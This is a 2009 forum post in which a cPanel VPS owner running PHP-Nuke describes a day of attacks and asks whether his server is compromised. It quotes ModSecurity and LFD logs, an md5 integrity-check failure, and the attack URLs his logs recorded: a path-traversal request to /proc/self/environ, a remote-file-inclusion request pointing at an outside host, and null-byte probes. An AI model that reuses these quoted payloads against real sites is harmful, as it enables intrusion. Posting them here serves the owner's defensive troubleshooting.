Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!

Have I been hacked?

Discussion in 'General Discussion' started by mattb37, May 18, 2009.

  1. mattb37

    mattb37 Registered

    Joined:
    May 18, 2009
    Messages:
    3
    Likes Received:
    0
    Trophy Points:
    51
    Services fail after UTF8 Abuse attack

    Hi, I have been a little worried about the security on my cPanel VPS, at my previous host my account was hacked and a phishing scam was launched from it. Now I am fully independent I don’t want the same thing happening again. Sorry for the lengthy post in advance but this is probably the best way I can get my situation across.

    The website in question runs phpnuke platinum which I know is very vulnerable to attacks, I have been trying to prevent the daily XSS attacks I get by disabling "allow_url_fopen" in php but I have still received notifications that remote exploits were being ran.

    Here is what I have had reported from lfd today.

    18:15 - LFD blocks an IP address for running UTF8 Encoding Abuse Attacks. IP address logged (85.214.145.133) as originating from Germany, later attacks I have had logged came from the same IP addresses range prompting my to terminate all unnecessary services.

    Code:
    [Mon May 18 18:10:00 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "39"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWaE6B-DQAAHb6fwsAAAAI"]
    
    [Mon May 18 18:10:03 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:year. [offset "41"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGWa06B-DQAAA4kF2kAAAAA"]
    
    [Mon May 18 18:14:32 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS_NAMES:nuke\\xa7bb\\xa7root\\xa7path. [offset "4"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "yournovavets.com"] [uri "/modules/Forums/favorites.php"] [unique_id "ShGXeE6B-DQAAHb7f94AAAAL"]
    
    [Mon May 18 18:14:45 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:sid. [offset "36"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXhU6B-DQAAA4kF2sAAAAA"]
    
    [Mon May 18 18:14:51 2009] [error] [client 85.214.145.133] ModSecurity: Access denied with code 406 (phase 2). Invalid UTF-8 encoding: invalid byte value in character at ARGS:uid. [offset "37"] [file "/usr/local/apache/conf/modsec2.user.conf"] [line "23"] [id "950801"] [msg "UTF8 Encoding Abuse Attack Attempt"] [severity "WARNING"] [hostname "www.novavets.com"] [uri "/modules.php"] [unique_id "ShGXi06B-DQAAC0VTA0AAAAJ"]
    
    19:18 - spamd, sshd & named fail.
    19:30 - PHP nuke fusion reports SQL exploit, IP address 85.214.73.46 banned by nuke.

    Code:
    Cause: Breach attempt on file admin.php or attempted to use SQL exploit Url String: /arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ
    20:19 - ftpd, mysql failed
    20:26 - XSS attack on php nuke cms

    Code:
    The user Anonymous was on the page admin.php on your site NovaVets Ip is: 85.214.73.46 User Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4
    Date: 2009.05.18 21:26:19
    Used Url: /admin.php?include_path=http:/www.fmf2004.hu/buggsbunny??
    
    20:38 - System integrity check failed on LFD and CSF (md5)

    Code:
    The following list of files have FAILED the md5sum comparison test. This means that the file has been changed in some way. This could be a result of an OS update or application upgrade. If the change is unexpected it should be investigated:
    
    /usr/sbin/csf: FAILED
    /etc/init.d/csf: FAILED
    /etc/init.d/lfd: FAILED
    
    20:19 - ftpd failed

    20:43 - I logged in via ssh, terminated unrequired services (httpd, ftp, pop, exim, named, imap & cpservd), backed up home directory to an external server, rebooted system. Upon system rebooting CSF would not start and I had to rebuild the csf conf.

    22:19 - enabled all services terminated at 20:43, rebooted system and it seems to be running fine.

    My mod security log has been showing 127.0.0.1 as requesting pages with the following get statements:
    • /%00/ HTTP/1.0
    • /index.jsp%00x HTTP/1.0
    • /ext.ini.%00.txt HTTP/1.0
    • /web-console/ServerInfo.jsp%00 HTTP/1.0

    Could the above list be an exploit being ran on the system?

    Regarding the XSS attacks and me failing to disable the "allow_url_fopen" how would I be best to proceed in disabling this function? I have tried and failed to find a solution over the past week or so.

    What can I do about the UTF8 abuse, is there something I can run to check the security on my VPS and what, if any damage could have been done. I am running CSF but am very restricted as to the amount of rules I can apply, keep hitting the 191/200 numiptent error. I might move all my web services to a dedicated server which I know would fix this and allow me to run a much larger set of rules.

    With everything above is it likely that my system has been compromised and I should be thinking about rebuilding various parts of it, particularly the services which failed the md5 check. I have changed passwords but I get the feeling that might not be enough with processes being ran locally.

    Thanks for reading this far and any replies would be much appreciated.

    Matt.
     
    #1 mattb37, May 18, 2009
    Last edited: May 18, 2009
Loading...

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice